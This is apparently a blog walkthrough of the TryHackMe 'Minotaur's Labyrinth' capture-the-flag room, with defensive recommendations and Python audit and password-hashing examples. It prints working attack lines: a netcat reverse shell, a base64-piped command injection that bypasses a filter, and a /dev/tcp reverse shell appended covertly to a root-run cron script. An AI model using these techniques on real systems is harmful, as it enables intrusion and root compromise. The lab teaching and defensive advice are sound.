TryHackMe — Minotaur’s Labyrinth Walkthrough

A walkthrough with my tactics, techniques, and procedures.

xocybersec, published in System Weakness
5 min read · Jan 15, 2024


Reconnaissance/Scanning:

I started off by scanning the target to see which ports were open and which services were running on them (`-A` already implies `-O`, `-sC` and `-sV`, so those extra flags are redundant but harmless).

$ nmap -A -O -sC -sV -p- <machine_IP>
Nmap scan results

Next I ran gobuster to brute-force directories on the web server.

Gobuster scan results

On the FTP server there's a directory worth looking into.

Directory on FTP server

In that directory there were a hidden directory and a text file. The text file didn't contain anything important.

Contents in pub directory

In the hidden directory was the first flag and another text file.

Contents in .secret directory
Proof of first flag

This is what the text file keep_in_mind said:

Contents of keep_in_mind file

Vulnerability assessment:

The /logs directory on the web server had a log file that exposed user credentials in plaintext!

File contents in /log directory on web server

Once logged in on the main webpage, there's a search bar whose results look like table or column names from a database.

I fired up Burp Suite, captured the request made when submitting a value in the search bar, saved it to a file, and fed that file to sqlmap:

$ sqlmap -r /path/to/request/file --batch --dump

Looks like we got some usernames and hashes!

DB table “people”
DB table “creatures”

Crackstation[.]net cracked them easily, since they're just plain MD5 hashes that any lookup table already contains!

Cracked hashes

Upon logging into the webpage, the top nav bar showed the second flag.

Proof of second flag

When viewing the source code, I saw this comment.

Comment in source code

And up at the top, the “Secret_Stuff” link leads to /echo.php

Source code showing destination

Exploit:

Visiting that page:

echo.php webpage

The hint from TryHackMe lists which characters are filtered by this page.

Filtered expressions

Luckily, the pipe character isn't filtered. Whatever is entered simply gets echoed back, so I tested with `whoami | bash`: the echoed `whoami` is piped into bash and executed instead of just being printed.

Echoed command

Since so many characters are filtered, I can't send a regular reverse shell command through the input.

Instead I base64-encode the command, so that only letters, digits, `+`, `/` and `=` have to get past the filter, and let the target decode and run it.

The reverse shell one liner I used was:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_IP> <PORT> >/tmp/f

I encoded that and removed the equal sign at the end, since it was one of the filtered characters. Not every base64 decoder accepts unpadded input, so a cleaner trick is to pad the command with trailing spaces until its length is a multiple of 3: the encoding then has no `=` to strip, and the shell ignores the extra whitespace.

<encoded_text> | base64 -d | bash 

After sending that, I got a reverse shell!

Proof of reverse shell

Checking for hidden files.

Interesting file

That looks like a good file to inspect!

Contents of dbConnect.php file

Looks like the root credentials for the DB.

Now to see the other users in the /home directory.

Other users on machine

In this user’s home directory was the user flag.

Proof of user flag

Privilege Escalation:

Looking for a way to escalate privileges, I had no luck with the cron jobs, couldn't run `sudo -l` without a password, and found no SUID binaries I could exploit.

I then started checking for hidden files or anything else useful in the root directory of the filesystem.

File that’s executable by all users

That's interesting: a directory called timers that's writable by all users.

One of the files on the FTP server had mentioned keeping things on a timer.

Contents of file timers

In that directory was a script that starts another bash shell, and it is run on a schedule by root.

Since I can write to that file, I appended a reverse shell one-liner to the end of it (`>>` appends, so the script's original contents keep working and nothing looks broken to whoever scheduled it):

$ echo "bash -i >& /dev/tcp/IP_ADDRESS/8080 0>&1" >> timer.sh

Shortly after that the timer fired and I got a reverse shell as root.

Proof of root shell

Time to grab the root flag in root's home directory.

Proof of root flag
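The privilege escalation above is the classic "world-writable script run by root" pattern. As an added example (not the walkthrough's own code), the Python below does the check a practitioner would run on a box, or that a defender would run in an audit: it lists world-writable paths the way `find / -perm -o+w` does, then parses system-crontab style lines and flags every scheduled script that an unprivileged user could modify, either because the file itself is world-writable or because its parent directory is (so the file can be replaced). The directory tree and crontab it scans are constructed in a temporary directory for the demonstration and are not the room's real filesystem.

```python
import os
import stat
import tempfile
from typing import List, Tuple


def world_writable_paths(root: str) -> List[str]:
    """Walk `root` and return every file or directory whose mode grants write
    access to 'other' (the same bit `find / -perm -o+w` tests). Symlinks are
    skipped: their own mode is always 777 and says nothing about the target."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def scheduled_script_risks(crontab_text: str) -> List[Tuple[str, str]]:
    """Parse system-crontab lines (5 time fields, user, command) and flag each
    absolute path in the command part that an unprivileged user could alter:
    the file is world-writable, or its parent directory is world-writable
    without the sticky bit, which lets anyone replace the file outright."""
    risks = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0] or len(fields) < 7:   # env assignment or malformed
            continue
        for token in fields[6:]:                 # the command and its arguments
            if not token.startswith("/"):
                continue
            try:
                st = os.stat(token)
                parent = os.stat(os.path.dirname(token))
            except OSError:
                continue                         # path does not exist here
            if st.st_mode & stat.S_IWOTH:
                risks.append((token, "file is world-writable"))
            if (parent.st_mode & stat.S_IWOTH) and not (parent.st_mode & stat.S_ISVTX):
                risks.append((token, "parent directory is world-writable"))
    return risks


def build_demo_tree() -> Tuple[str, str, str, str]:
    """Constructed sample, not the room's real filesystem: a world-writable
    timers directory holding a world-writable timer.sh (the situation on the
    page) next to a properly permissioned backup script, plus a crontab that
    runs both as root. Returns (root, crontab_text, timer_path, safe_path)."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    timers = os.path.join(root, "timers")
    bindir = os.path.join(root, "bin")
    os.makedirs(timers)
    os.makedirs(bindir)
    timer = os.path.join(timers, "timer.sh")
    safe = os.path.join(bindir, "backup.sh")
    for path in (timer, safe):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho tick\n")
    os.chmod(timers, 0o777)   # drwxrwxrwx: anyone can replace files inside
    os.chmod(timer, 0o777)    # -rwxrwxrwx: anyone can append to the script
    os.chmod(bindir, 0o755)
    os.chmod(safe, 0o755)
    crontab = (
        "SHELL=/bin/bash\n"
        "PATH=/usr/local/bin:/usr/bin:/bin\n"
        f"* * * * * root /bin/bash {timer}\n"
        f"0 3 * * * root {safe}\n"
    )
    return root, crontab, timer, safe


if __name__ == "__main__":
    root, crontab, _, _ = build_demo_tree()
    print("world-writable under", root, ":", world_writable_paths(root))
    for path, why in scheduled_script_risks(crontab):
        print(f"{path}: {why}")
```

On a real host you would point `world_writable_paths` at `/` and feed `scheduled_script_risks` the contents of `/etc/crontab` and `/etc/cron.d/*`; systemd timers need the same check on the `ExecStart=` path of the corresponding service unit.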

Reporting:

  • Disable anonymous login on FTP servers.
  • Don't pass user input to a shell at all; a character blocklist like the one on echo.php was bypassed with base64 encoding.
  • Ensure correct permissions on all files, especially scripts that root runs on a schedule: a world-writable script is a root shell waiting to happen.
  • Don't store credentials in plaintext, including in log files and web-accessible config files.
  • Store passwords with a salted, slow password hash (bcrypt, scrypt, Argon2 or PBKDF2) instead of unsalted MD5, which online lookup tables reverse instantly.
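To make the last two points concrete, here is an added Python example (not from the walkthrough) that contrasts how the room stored passwords with how they should be stored. It runs a dictionary attack against an unsalted MD5 digest, which is all a site like Crackstation does at scale, and then stores and verifies the same password with salted, iterated PBKDF2-HMAC-SHA256 from the standard library. The wordlist is constructed for the demonstration and is not the room's real cracked passwords; in production a library-backed bcrypt, scrypt or Argon2 is preferable, PBKDF2 is used here only because it needs no third-party package.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed wordlist for the demonstration, not the room's real passwords.
WORDLIST = ["123456", "password", "minotaur", "labyrinth", "daedalus", "letmein"]

PBKDF2_ITERATIONS = 600_000  # OWASP's current minimum for PBKDF2-HMAC-SHA256


def md5_hex(password: str) -> str:
    """Unsalted MD5, the way the room's database stored passwords."""
    return hashlib.md5(password.encode(), usedforsecurity=False).hexdigest()


def crack_unsalted_md5(digest_hex: str, wordlist) -> Optional[str]:
    """Dictionary attack: one cheap MD5 per candidate, no salt to slow anything
    down, and the same digest matches every user who chose that password.
    An online lookup table is exactly this, precomputed over billions of
    candidates, so a hit is a single lookup."""
    target = digest_hex.lower()
    for candidate in wordlist:
        if md5_hex(candidate) == target:
            return candidate
    return None


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256 in a self-describing encoded form.
    A fresh random salt per user defeats precomputed tables (two users with
    the same password get different strings), and the iteration count makes
    every guess cost real CPU time for the attacker."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in
    constant time, so timing does not leak how many bytes matched."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Two users who picked the same password: identical MD5, instant crack.
    leaked = md5_hex("labyrinth")
    print("md5 for both users:", leaked, "->", crack_unsalted_md5(leaked, WORDLIST))
    # Same password stored properly: different strings, and still verifiable.
    stored_a, stored_b = hash_password("labyrinth"), hash_password("labyrinth")
    print("pbkdf2 user a:", stored_a)
    print("pbkdf2 user b:", stored_b)
    print("verify:", verify_password("labyrinth", stored_a), verify_password("wrong", stored_a))
```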
